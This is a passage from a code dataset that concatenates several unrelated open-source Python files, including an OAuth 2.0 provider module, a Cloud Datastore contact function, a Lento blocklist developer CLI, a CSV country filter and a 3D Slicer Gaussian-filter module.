literalinclude:: examples/base_server.py\n\nInstallation\n============\n\npython-oauth2 is available on\n`PyPI `_::\n\n pip install python-oauth2\n\n\"\"\"\n\nimport json\nfrom oauth2.client_authenticator import ClientAuthenticator, request_body\nfrom oauth2.error import OAuthInvalidError, \\\n ClientNotFoundError, OAuthInvalidNoRedirectError, UnsupportedGrantError\nfrom oauth2.log import app_log\nfrom oauth2.web import Response\nfrom oauth2.tokengenerator import Uuid4\nfrom oauth2.grant import Scope, AuthorizationCodeGrant, ImplicitGrant, \\\n ClientCredentialsGrant, ResourceOwnerGrant, RefreshToken\n\nVERSION = \"1.1.1\"\n\n\nclass Provider(object):\n \"\"\"\n Endpoint of requests to the OAuth 2.0 provider.\n\n :param access_token_store: An object that implements methods defined\n by :class:`oauth2.store.AccessTokenStore`.\n :type access_token_store: oauth2.store.AccessTokenStore\n :param auth_code_store: An object that implements methods defined by\n :class:`oauth2.store.AuthCodeStore`.\n :type auth_code_store: oauth2.store.AuthCodeStore\n :param client_store: An object that implements methods defined by\n :class:`oauth2.store.ClientStore`.\n :type client_store: oauth2.store.ClientStore\n :param token_generator: Object to generate unique tokens.\n :type token_generator: oauth2.tokengenerator.TokenGenerator\n :param client_authentication_source: A callable which when executed,\n authenticates a client.\n See :mod:`oauth2.client_authenticator`.\n :type client_authentication_source: callable\n :param response_class: Class of the response object.\n Defaults to :class:`oauth2.web.Response`.\n :type response_class: oauth2.web.Response\n\n .. versionchanged:: 1.0.0\n Removed parameter ``site_adapter``.\n \"\"\"\n authorize_path = \"/authorize\"\n token_path = \"/token\"\n\n def __init__(self, access_token_store, auth_code_store, client_store,\n token_generator, client_authentication_source=request_body,\n response_class=Response):\n self.grant_types = []\n self._input_handler = None\n\n self.access_token_store = access_token_store\n self.auth_code_store = auth_code_store\n self.client_authenticator = ClientAuthenticator(\n client_store=client_store,\n source=client_authentication_source)\n self.response_class = response_class\n self.token_generator = token_generator\n\n def add_grant(self, grant):\n \"\"\"\n Adds a Grant that the provider should support.\n\n :param grant: An instance of a class that extends\n :class:`oauth2.grant.GrantHandlerFactory`\n :type grant: oauth2.grant.GrantHandlerFactory\n \"\"\"\n if hasattr(grant, \"expires_in\"):\n self.token_generator.expires_in[grant.grant_type] = grant.expires_in\n\n if hasattr(grant, \"refresh_expires_in\"):\n self.token_generator.refresh_expires_in = grant.refresh_expires_in\n\n self.grant_types.append(grant)\n\n def dispatch(self, request, environ):\n \"\"\"\n Checks which Grant supports the current request and dispatches to it.\n\n :param request: The incoming request.\n :type request: :class:`oauth2.web.Request`\n :param environ: Dict containing variables of the environment.\n :type environ: dict\n\n :return: An instance of ``oauth2.web.Response``.\n \"\"\"\n try:\n grant_type = self._determine_grant_type(request)\n\n response = self.response_class()\n\n grant_type.read_validate_params(request)\n\n return grant_type.process(request, response, environ)\n except OAuthInvalidNoRedirectError:\n response = self.response_class()\n response.add_header(\"Content-Type\", \"application/json\")\n response.status_code = 400\n response.body = 
json.dumps({\n \"error\": \"invalid_redirect_uri\",\n \"error_description\": \"Invalid redirect URI\"\n })\n\n return response\n except OAuthInvalidError as err:\n response = self.response_class()\n return grant_type.handle_error(error=err, response=response)\n except UnsupportedGrantError:\n response = self.response_class()\n response.add_header(\"Content-Type\", \"application/json\")\n response.status_code = 400\n response.body = json.dumps({\n \"error\": \"unsupported_response_type\",\n \"error_description\": \"Grant not supported\"\n })\n\n return response\n except:\n app_log.error(\"Uncaught Exception\", exc_info=True)\n response = self.response_class()\n return grant_type.handle_error(\n error=OAuthInvalidError(error=\"server_error\",\n explanation=\"Internal server error\"),\n response=response)\n\n def enable_unique_tokens(self):\n \"\"\"\n Enable the use of unique access tokens on all grant types that support\n this option.\n \"\"\"\n for grant_type in self.grant_types:\n if hasattr(grant_type, \"unique_token\"):\n grant_type.unique_token = True\n\n @property\n def scope_separator(self, separator):\n \"\"\"\n Sets the separator of values in the scope query parameter.\n Defaults to \" \" (whitespace).\n\n The following code makes the Provider use \",\" instead of \" \"::\n\n provider = Provider()\n\n provider.scope_separator = \",\"\n\n Now the scope parameter in the request of a client can look like this:\n `scope=foo,bar`.\n \"\"\"\n Scope.separator = separator\n\n def _determine_grant_type(self, request):\n for grant in self.grant_types:\n grant_handler = grant(request, self)\n if grant_handler is not None:\n return grant_handler\n\n raise UnsupportedGrantError\n","repo_name":"wndhydrnt/python-oauth2","sub_path":"oauth2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"31"} +{"seq_id":"11256251872","text":"\nimport os\nfrom flask import escape\nfrom google.cloud import datastore\n\ndef add_contact(request):\n request_json = request.get_json(silent=True)\n\n name = request_json['name']\n company = request_json['company']\n email = request_json['email']\n phone = request_json['phone']\n\n client = datastore.Client(os.environ['GCP_PROJECT_ID'])\n complete_key = client.key('Contacts')\n contact = datastore.Entity(key=complete_key)\n contact.update({\n 'name': name,\n 'company': company,\n 'email': email,\n 'phone': phone,\n })\n client.put(contact)\n\n return('Contact added.\\n',200)\n\n","repo_name":"techmaven/cloud-fn-training","sub_path":"Exercise5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70348319449","text":"# THIS LENTO CLI IS FOR DEVELOPER USE ONLY. DO NOT\n# ATTEMPT TO USE THIS FOR SCRIPTING PURPOSES. END-USER\n# USE OF THIS SCRIPT IS NOT SUPPORTED. 
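`Provider._determine_grant_type` above is a chain-of-responsibility dispatch: each registered grant factory is called with the request, and the first one that returns a handler wins; if none match, the request is unsupported. A stripped-down model of that flow; the two grant classes below are hypothetical stand-ins, not part of python-oauth2's API:

```python
# First-match-wins dispatch over grant factories, as in python-oauth2.
class AuthCodeGrant:
    def __call__(self, request):
        if request.get("response_type") == "code":
            return "auth-code-handler"
        return None

class PasswordGrant:
    def __call__(self, request):
        if request.get("grant_type") == "password":
            return "password-handler"
        return None

def determine_grant_type(request, grant_types):
    for grant in grant_types:
        handler = grant(request)
        if handler is not None:
            return handler
    raise LookupError("unsupported grant")

grants = [AuthCodeGrant(), PasswordGrant()]
print(determine_grant_type({"grant_type": "password"}, grants))  # password-handler
```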
WE USE THIS\n# SCRIPT FOR LIVE-AMMO TESTING OF THE BACKEND; USING\n# IT WITH LENTO MAY HAVE UNINTENDED OR UNEXPECTED\n# CONSEQUENCES.\nimport argparse\nimport copy\nimport json\nimport os\nimport platform\nfrom lento.common import cards_management as CardsManagement\nfrom lento import utils\nfrom tests import helpers\n\nparser = argparse.ArgumentParser(\n description=\"Run backend functions to make sure they work.\"\n)\nparser.add_argument(\n \"name\",\n type=str,\n help=\"name of function to run\"\n)\nparser.add_argument(\"param1\", nargs='?')\nparser.add_argument(\"param2\", nargs='?')\nparser.add_argument(\"param3\", nargs='?')\nparser.add_argument(\"param4\", nargs='?')\nparser.add_argument(\"param5\", nargs='?')\nparser.add_argument(\"param6\", nargs='?')\nparser.add_argument(\"param7\", nargs='?')\nparser.add_argument(\"param8\", nargs='?')\nparser.add_argument(\"param9\", nargs='?')\nparser.add_argument(\"param10\", nargs='?')\n\nargs = parser.parse_args()\nf = args.name\nparam1 = args.param1\nparam2 = args.param2\nparam3 = args.param3\nparam4 = args.param4\nparam5 = args.param5\nparam6 = args.param6\nparam7 = args.param7\nparam8 = args.param8\nparam9 = args.param9\nparam10 = args.param10\n\nresult_options = {\n \"message\": f\"ran {f} successfully!\",\n \"output\": None,\n}\n\nif f == \"create_card\":\n CardsManagement.create_card()\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"read_cards\":\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"delete_card\":\n CardsManagement.delete_card(param1)\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"update_metadata\":\n CardsManagement.update_metadata(param1, param2, param3)\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"add_to_site_blocklists\":\n CardsManagement.add_to_site_blocklists(param1, param2, param3)\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"update_site_blocklists\":\n CardsManagement.update_site_blocklists(\n param1,\n param2,\n {\n \"youtube.com\": True,\n \"twitter.com\": False\n }\n )\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"add_to_app_blocklists\":\n if platform.system() == \"Windows\":\n apps_to_add = copy.deepcopy(helpers.data[\"apps_to_add\"])\n apps_to_add[1][\"path\"] = os.path.join(\n os.path.expanduser(\"~\"),\n \"AppData\",\n \"Local\",\n \"Vivaldi\",\n \"Application\",\n \"vivaldi.exe\"\n )\n apps_to_add[1][\"icon_path\"] = os.path.join(\n os.path.expanduser(\"~\"),\n \"AppData\",\n \"Local\",\n \"Lento\",\n \"vivaldi.bmp\"\n )\n CardsManagement.add_to_app_blocklists(\n param1,\n param2,\n apps_to_add\n )\n result_options[\"output\"] = CardsManagement.read_cards()\n elif platform.system() == \"Darwin\":\n CardsManagement.add_to_app_blocklists(\n param1,\n param2,\n [\n \"/Applications/GRIS.app\",\n \"/Applications/Scrivener.app\",\n \"/Applications/NetNewsWire.app\"\n ]\n )\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"get_apps\":\n r = utils.get_apps()\n result_options[\"output\"] = r\nelif f == \"update_app_blocklists\":\n if platform.system() == \"Windows\":\n CardsManagement.update_app_blocklists(\n param1,\n param2,\n {\n \"vivaldi\": {\n \"enabled\": True,\n \"path\": \"C:\\\\Users\\\\natha\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\", # noqa: E501\n \"app_icon_path\": \"C:\\\\Users\\\\natha\\\\AppData\\\\Local\\\\Lento\\\\vivaldi.bmp\" # noqa: E501\n },\n \"Trello\": {\n \"enabled\": False,\n \"path\": 
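The developer CLI above declares one required positional plus ten optional ones via `nargs='?'`, so unsupplied parameters simply come back as `None` and each dispatch branch picks out the ones it needs. A smaller sketch of the same argparse pattern (the argument values are made up for illustration):

```python
# Optional positionals with nargs='?': missing values default to None.
import argparse

parser = argparse.ArgumentParser(description="dispatch a backend function")
parser.add_argument("name", type=str, help="name of function to run")
parser.add_argument("param1", nargs="?")
parser.add_argument("param2", nargs="?")

args = parser.parse_args(["update_metadata", "card-1"])
print(args.name, args.param1, args.param2)  # update_metadata card-1 None
```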
\"C:\\\\Program Files\\\\WindowsApps\\\\45273LiamForsyth.PawsforTrello_2.12.5.0_x64__7pb5ddty8z1pa\\\\app\\\\Trello.exe\", # noqa: E501\n \"app_icon_path\": \"C:\\\\Program Files\\\\WindowsApps\\\\45273LiamForsyth.PawsforTrello_2.12.5.0_x64__7pb5ddty8z1pa\\\\assets\\\\Square310x310Logo.scale-200.png\" # noqa: E501\n }\n }\n )\n elif platform.system() == \"Darwin\":\n CardsManagement.update_app_blocklists(\n param1,\n param2,\n {\n \"Scrivener\": {\n \"enabled\": True,\n \"bundle_id\": \"com.literatureandlatte.scrivener3\",\n \"app_icon_path\": \"~/Library/Application Support/Lento/Scrivener.jpg\" # noqa: E501\n },\n \"NetNewsWire\": {\n \"enabled\": True,\n \"bundle_id\": \"com.ranchero.NetNewsWire-Evergreen\",\n \"app_icon_path\": \"~/Library/Application Support/Lento/NetNewsWire.jpg\" # noqa: E501\n },\n \"GRIS\": {\n \"enabled\": True,\n \"bundle_id\": \"unity.nomada studio.GRIS\",\n \"app_icon_path\": \"~/Library/Application Support/Lento/GRIS.jpg\" # noqa: E501\n },\n }\n )\nelif f == \"add_notification\":\n CardsManagement.add_notification(\n param1,\n True,\n param2,\n \"banner\",\n [\"twitter.com\", \"youtube.com\"],\n [\"Debug USACO problem\"],\n 42,\n \"get back to work\",\n \"keep focused\",\n {\n \"reminder\": \"~/Desktop/reminder.mp3\",\n \"Frog\": \"/System/Library/Sounds/Frog.aiff\"\n }\n )\nelif f == \"update_notification_list\":\n CardsManagement.update_notification_list(\n param1,\n {\n \"2d189b37-6eaf-478f-a5ab-e19c9dab5738\": {\n \"name\": \"testnotif2\",\n \"enabled\": True,\n \"type\": \"banner\",\n \"blocked_visit_triggers\": [\n \"twitter.com\",\n \"youtube.com\"\n ],\n \"associated_goals\": [\n \"Debug USACO problem\"\n ],\n \"time_interval_trigger\": 42,\n \"title\": \"get back to work\",\n \"body\": \"keep focused\",\n \"audio_paths\": {\n \"reminder\": \"~/Desktop/reminder.mp3\",\n \"Frog\": \"/System/Library/Sounds/Frog.aiff\"\n }\n },\n \"ba606651f167406ca7cd88a8c9b05ceb\": {\n \"name\": \"testnotif1\",\n \"enabled\": True,\n \"type\": \"banner\",\n \"blocked_visit_triggers\": [\n \"twitter.com\",\n \"youtube.com\"\n ],\n \"associated_goals\": [\n \"Debug USACO problem\"\n ],\n \"time_interval_trigger\": 42,\n \"title\": \"get back to work\",\n \"body\": \"keep focused\",\n \"audio_paths\": {\n \"reminder\": \"~/Desktop/reminder.mp3\",\n \"Frog\": \"/System/Library/Sounds/Frog.aiff\"\n }\n }\n },\n )\nelif f == \"add_goal\":\n CardsManagement.add_goal(param1, param2)\nelif f == \"update_goal_list\":\n CardsManagement.update_goal_list(param1, {\n \"Conquer world\": True,\n \"Debug USACO problem\": False,\n })\nelse:\n result_options[\"message\"] = f\"INVALID COMMAND: {f}\"\n\nprint(result_options[\"message\"])\nif result_options[\"output\"] is not None:\n print(\"OUTPUT:\")\n print(json.dumps(result_options[\"output\"], indent=4))\n","repo_name":"clayboone/lento","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"417598959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 10:02:55 2019\n\n@author: lavanyasingh\n\"\"\"\n\n# script to prepare data for the cohort of Berkeley interns \n\nimport csv\nfrom fuzzywuzzy import fuzz\nimport helpers\n\nINFILE = 'data/all_raw_cleaned.csv'\nOUTFILE = 'data/bolivia sources.csv'\n\ndef write_filtered(filter_fun, index):\n '''\n reads rows in from INFILE\n takes a filter function as first argument, of type string->bool\n takes index to filter on as 
second argument, of type int\n writes filtered records to OUTFILE\n '''\n total = 0\n with open(INFILE, 'r') as inf, open(OUTFILE, 'w') as outf:\n reader = csv.reader(inf, delimiter=',')\n w = csv.writer(outf, delimiter=',', quotechar='\"', \n quoting=csv.QUOTE_MINIMAL)\n for line in reader:\n if filter_fun(line[index]):\n total += 1\n w.writerow(line)\n print(f\"WROTE {total} LINES\")\n\ndef bolivia_filter(country):\n r = fuzz.ratio(country, \"Bolivia\")\n return r > 75\n\nif __name__ == '__main__':\n write_filtered(bolivia_filter, 0)","repo_name":"lsingh123/GSC2019worldnewsproject","sub_path":"UCB_interns.py","file_name":"UCB_interns.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5066930488","text":"import logging\nimport os\nfrom typing import Annotated, Optional\n\nimport vtk\n\nimport slicer\nfrom slicer.ScriptedLoadableModule import *\nfrom slicer.util import VTKObservationMixin\nfrom slicer.parameterNodeWrapper import (\n parameterNodeWrapper,\n WithinRange,\n)\n\nfrom slicer import vtkMRMLScalarVolumeNode\n\nimport SimpleITK as sitk\n#\n# MauritanieGaussianFilter\n#\n\nclass MauritanieGaussianFilter(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"MauritanieGaussianFilter\" # TODO: make this more human readable by adding spaces\n self.parent.categories = [\"Segmentation\"] # TODO: set categories (folders where the module shows up in the module selector)\n self.parent.dependencies = [] # TODO: add here list of module names that this module requires\n self.parent.contributors = [\"Mohamed Abdellahi Sidi Mohamed Blal (UN-FST)\"] # TODO: replace with \"Firstname Lastname (Organization)\"\n # TODO: update with short description of the module and a link to online module documentation\n self.parent.helpText = \"\"\"\nThis is an example of scripted loadable module bundled in an extension.\nSee more information in module documentation.\n\"\"\"\n # TODO: replace with organization, grant and thanks\n self.parent.acknowledgementText = \"\"\"\n\"\"\"\n\n # Additional initialization step after application startup is complete\n slicer.app.connect(\"startupCompleted()\", registerSampleData)\n\n\n#\n# Register sample data sets in Sample Data module\n#\n\ndef registerSampleData():\n \"\"\"\n Add data sets to Sample Data module.\n \"\"\"\n # It is always recommended to provide sample data for users to make it easy to try the module,\n # but if no sample data is available then this method (and associated startupCompeted signal connection) can be removed.\n\n import SampleData\n iconsPath = os.path.join(os.path.dirname(__file__), 'Resources/Icons')\n\n # To ensure that the source code repository remains small (can be downloaded and installed quickly)\n # it is recommended to store data sets that are larger than a few MB in a Github release.\n\n # MauritanieGaussianFilter1\n SampleData.SampleDataLogic.registerCustomSampleDataSource(\n # Category and sample name displayed in Sample Data module\n category='MauritanieGaussianFilter',\n sampleName='MauritanieGaussianFilter1',\n # Thumbnail should have size of approximately 260x280 pixels and stored in Resources/Icons folder.\n # It can be created by Screen Capture module, \"Capture all views\" option enabled, 
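`bolivia_filter` earlier uses fuzzywuzzy's `fuzz.ratio` with a threshold of 75 to tolerate spelling variants. The standard library's `difflib.SequenceMatcher` gives a comparable (though not identical) 0-100 score, so the idea can be tried without extra dependencies:

```python
# Fuzzy country matching with the standard library; SequenceMatcher.ratio()
# plays the role of fuzz.ratio, scaled to 0-100.
from difflib import SequenceMatcher

def bolivia_filter(country, threshold=75):
    score = SequenceMatcher(None, country, "Bolivia").ratio() * 100
    return score > threshold

print(bolivia_filter("Bolivia"))   # True
print(bolivia_filter("Bolívia"))   # True  (accented spelling still scores ~86)
print(bolivia_filter("Chile"))     # False
```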
\"Number of images\" set to \"Single\".\n thumbnailFileName=os.path.join(iconsPath, 'MauritanieGaussianFilter1.png'),\n # Download URL and target file name\n uris=\"https://github.com/Slicer/SlicerTestingData/releases/download/SHA256/998cb522173839c78657f4bc0ea907cea09fd04e44601f17c82ea27927937b95\",\n fileNames='MauritanieGaussianFilter1.nrrd',\n # Checksum to ensure file integrity. Can be computed by this command:\n # import hashlib; print(hashlib.sha256(open(filename, \"rb\").read()).hexdigest())\n checksums='SHA256:998cb522173839c78657f4bc0ea907cea09fd04e44601f17c82ea27927937b95',\n # This node name will be used when the data set is loaded\n nodeNames='MauritanieGaussianFilter1'\n )\n\n # MauritanieGaussianFilter2\n SampleData.SampleDataLogic.registerCustomSampleDataSource(\n # Category and sample name displayed in Sample Data module\n category='MauritanieGaussianFilter',\n sampleName='MauritanieGaussianFilter2',\n thumbnailFileName=os.path.join(iconsPath, 'MauritanieGaussianFilter2.png'),\n # Download URL and target file name\n uris=\"https://github.com/Slicer/SlicerTestingData/releases/download/SHA256/1a64f3f422eb3d1c9b093d1a18da354b13bcf307907c66317e2463ee530b7a97\",\n fileNames='MauritanieGaussianFilter2.nrrd',\n checksums='SHA256:1a64f3f422eb3d1c9b093d1a18da354b13bcf307907c66317e2463ee530b7a97',\n # This node name will be used when the data set is loaded\n nodeNames='MauritanieGaussianFilter2'\n )\n\n\n#\n# MauritanieGaussianFilterParameterNode\n#\n\n@parameterNodeWrapper\nclass MauritanieGaussianFilterParameterNode:\n \"\"\"\n The parameters needed by module.\n\n inputVolume - The volume to threshold.\n thresholdedVolume - The output volume that will contain the filtred volume.\n \"\"\"\n inputVolume: vtkMRMLScalarVolumeNode\n thresholdedVolume: vtkMRMLScalarVolumeNode\n\n\n#\n# MauritanieGaussianFilterWidget\n#\n\nclass MauritanieGaussianFilterWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent=None) -> None:\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None\n self._parameterNode = None\n self._parameterNodeGuiTag = None\n\n def setup(self) -> None:\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.setup(self)\n\n # Load widget from .ui file (created by Qt Designer).\n # Additional widgets can be instantiated manually and added to self.layout.\n uiWidget = slicer.util.loadUI(self.resourcePath('UI/MauritanieGaussianFilter.ui'))\n self.layout.addWidget(uiWidget)\n self.ui = slicer.util.childWidgetVariables(uiWidget)\n\n # Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\n uiWidget.setMRMLScene(slicer.mrmlScene)\n\n # Create logic class. 
Logic implements all computations that should be possible to run\n # in batch mode, without a graphical user interface.\n self.logic = MauritanieGaussianFilterLogic()\n\n # Connections\n\n # These connections ensure that we update parameter node when scene is closed\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.StartCloseEvent, self.onSceneStartClose)\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndCloseEvent, self.onSceneEndClose)\n\n # Buttons\n self.ui.applyButton.connect('clicked(bool)', self.onApplyButton)\n\n # Make sure parameter node is initialized (needed for module reload)\n self.initializeParameterNode()\n\n def cleanup(self) -> None:\n \"\"\"\n Called when the application closes and the module widget is destroyed.\n \"\"\"\n self.removeObservers()\n\n def enter(self) -> None:\n \"\"\"\n Called each time the user opens this module.\n \"\"\"\n # Make sure parameter node exists and observed\n self.initializeParameterNode()\n\n def exit(self) -> None:\n \"\"\"\n Called each time the user opens a different module.\n \"\"\"\n # Do not react to parameter node changes (GUI will be updated when the user enters into the module)\n if self._parameterNode:\n self._parameterNode.disconnectGui(self._parameterNodeGuiTag)\n self._parameterNodeGuiTag = None\n self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self._checkCanApply)\n\n def onSceneStartClose(self, caller, event) -> None:\n \"\"\"\n Called just before the scene is closed.\n \"\"\"\n # Parameter node will be reset, do not use it anymore\n self.setParameterNode(None)\n\n def onSceneEndClose(self, caller, event) -> None:\n \"\"\"\n Called just after the scene is closed.\n \"\"\"\n # If this module is shown while the scene is closed then recreate a new parameter node immediately\n if self.parent.isEntered:\n self.initializeParameterNode()\n\n def initializeParameterNode(self) -> None:\n \"\"\"\n Ensure parameter node exists and observed.\n \"\"\"\n # Parameter node stores all user choices in parameter values, node selections, etc.\n # so that when the scene is saved and reloaded, these settings are restored.\n\n self.setParameterNode(self.logic.getParameterNode())\n\n # Select default input nodes if nothing is selected yet to save a few clicks for the user\n if not self._parameterNode.inputVolume:\n firstVolumeNode = slicer.mrmlScene.GetFirstNodeByClass(\"vtkMRMLScalarVolumeNode\")\n if firstVolumeNode:\n self._parameterNode.inputVolume = firstVolumeNode\n\n def setParameterNode(self, inputParameterNode: Optional[MauritanieGaussianFilterParameterNode]) -> None:\n \"\"\"\n Set and observe parameter node.\n Observation is needed because when the parameter node is changed then the GUI must be updated immediately.\n \"\"\"\n\n if self._parameterNode:\n self._parameterNode.disconnectGui(self._parameterNodeGuiTag)\n self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self._checkCanApply)\n self._parameterNode = inputParameterNode\n if self._parameterNode:\n # Note: in the .ui file, a Qt dynamic property called \"SlicerParameterName\" is set on each\n # ui element that needs connection.\n self._parameterNodeGuiTag = self._parameterNode.connectGui(self.ui)\n self.addObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self._checkCanApply)\n self._checkCanApply()\n\n def _checkCanApply(self, caller=None, event=None) -> None:\n if self._parameterNode and self._parameterNode.inputVolume and self._parameterNode.thresholdedVolume:\n self.ui.applyButton.toolTip = \"Compute output 
volume\"\n self.ui.applyButton.enabled = True\n else:\n self.ui.applyButton.toolTip = \"Select input and output volume nodes\"\n self.ui.applyButton.enabled = False\n\n def onApplyButton(self) -> None:\n \"\"\"\n Run processing when user clicks \"Apply\" button.\n \"\"\"\n \n # inputVolumeNode = self.ui.inputSelector.currentNode()\n # outputVolumeNode = self.ui.outputSelector.currentNode()\n \n with slicer.util.tryWithErrorDisplay(\"Failed to compute results.\", waitCursor=True):\n \n inputVolumeNode = self.ui.inputSelector.currentNode()\n outputVolumeNode = self.ui.outputSelector.currentNode()\n if not inputVolumeNode or not outputVolumeNode:\n slicer.util.errorDisplay(\"Invalid input or output volume nodes.\")\n return\n \n print(f\"inputVolumeNode : {inputVolumeNode}\")\n\n filtered_image = self.logic.apply_filter(inputVolumeNode)\n\n # # Use slicer.util.arrayFromVolume, not arrayFromVolumeNode\n # filtered_array = slicer.util.arrayFromVolume(outputVolumeNode)\n # filtered_array[:] = filtered_image # Update the data\n \n \n \n \n # Update the new volume node with the filtered image data\n slicer.util.updateVolumeFromArray(outputVolumeNode, filtered_image)\n\n # Notify Slicer that the volume data has changed\n outputVolumeNode.GetImageData().Modified()\n\n # Update the display\n slicer.app.applicationLogic().GetSelectionNode().SetReferenceActiveVolumeID(outputVolumeNode.GetID())\n slicer.app.applicationLogic().PropagateVolumeSelection(0)\n\n\n#\n# MauritanieGaussianFilterLogic\n#\n\nclass MauritanieGaussianFilterLogic(ScriptedLoadableModuleLogic):\n \"\"\"This class should implement all the actual\n computation done by your module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"\n Called when the logic class is instantiated. 
Can be used for initializing member variables.\n        \"\"\"\n        ScriptedLoadableModuleLogic.__init__(self)\n\n    def getParameterNode(self):\n        return MauritanieGaussianFilterParameterNode(super().getParameterNode())\n\n    def apply_filter(self, inputVolume):\n        \"\"\"\n        Gaussian filter:\n        Explanation: this filter removes noise by blurring the image, which suppresses high-frequency detail.\n        Use: noise reduction and image smoothing.\n\n        Parameters:\n        image: input image.\n        sigma: standard deviation of the Gaussian filter.\n        \"\"\"\n\n        # Get volume data\n        input_data = slicer.util.array(inputVolume.GetID())\n        print(f\"input_data : {input_data}\")\n\n        # Convert to SimpleITK image\n        sitk_image = sitk.GetImageFromArray(input_data)\n\n        # Apply Gaussian smoothing filter\n        filtered_image = sitk.SmoothingRecursiveGaussian(sitk_image, sigma=2.0)\n\n        # Convert back to numpy array\n        filtered_data = sitk.GetArrayFromImage(filtered_image)\n\n        return filtered_data\n\n\n\n#\n# MauritanieGaussianFilterTest\n#\n\nclass MauritanieGaussianFilterTest(ScriptedLoadableModuleTest):\n    \"\"\"\n    This is the test case for your scripted module.\n    Uses ScriptedLoadableModuleTest base class, available at:\n    https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n    \"\"\"\n\n    def setUp(self):\n        \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n        \"\"\"\n        slicer.mrmlScene.Clear()\n\n    def runTest(self):\n        \"\"\"Run as few or as many tests as needed here.\n        \"\"\"\n        self.setUp()\n        self.test_MauritanieGaussianFilter1()\n\n    def test_MauritanieGaussianFilter1(self):\n        \"\"\" Ideally you should have several levels of tests. At the lowest level\n        tests should exercise the functionality of the logic with different inputs\n        (both valid and invalid). At higher levels your tests should emulate the\n        way the user would interact with your code and confirm that it still works\n        the way you intended.\n        One of the most important features of the tests is that they should alert other\n        developers when their changes will have an impact on the behavior of your\n        module. 
For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n\n # Get/create input data\n\n import SampleData\n registerSampleData()\n inputVolume = SampleData.downloadSample('MauritanieGaussianFilter1')\n self.delayDisplay('Loaded test data set')\n\n # inputScalarRange = inputVolume.GetImageData().GetScalarRange()\n # self.assertEqual(inputScalarRange[0], 0)\n # self.assertEqual(inputScalarRange[1], 695)\n\n outputVolume = slicer.mrmlScene.AddNewNodeByClass(\"vtkMRMLScalarVolumeNode\")\n # threshold = 100\n\n # Test the module logic\n\n logic = MauritanieGaussianFilterLogic()\n \n filtered_image = logic.apply_filter(inputVolume)\n \n # Update the new volume node with the filtered image data\n slicer.util.updateVolumeFromArray(outputVolume, filtered_image)\n\n # Notify Slicer that the volume data has changed\n outputVolume.GetImageData().Modified()\n\n self.delayDisplay('Test passed')\n","repo_name":"mhdabdellah/SlicerMauritanieUN_FST","sub_path":"MauritanieGaussianFilter/MauritanieGaussianFilter.py","file_name":"MauritanieGaussianFilter.py","file_ext":"py","file_size_in_byte":16192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22199526869","text":"# coding:utf-8\n\nimport os\nfrom time import strftime, localtime\nimport re\nfrom hashlib import md5\nimport requests\n\nROOT_DIR = os.path.abspath(os.path.dirname(__file__))\n\ndef get_html_filename(url, dst_name=None):\n log_txt = ROOT_DIR+\"/log.txt\"\n if os.path.exists(log_txt):\n with open(log_txt, \"r\") as f:\n a = re.findall(\"%s\\n(.*?)\\n\\n\" % url, f.read())\n if a:\n # print(\"find it in cache\")\n return ROOT_DIR+\"/html/\"+a[0]\n\n # print(\"not in cache\")\n if not dst_name:\n dst_name = md5(url.encode(\"utf-8\")).hexdigest() + \"_\" + \\\n strftime(\"%Y%m%d%H%M\", localtime()) + \".html\" \n\n page = requests.get(url)\n if page.status_code != 200:\n print(\"could not get page source html: %s\" % str(page.status_code))\n exit(1)\n\n print(\"download HTML page source : %s\" % url)\n with 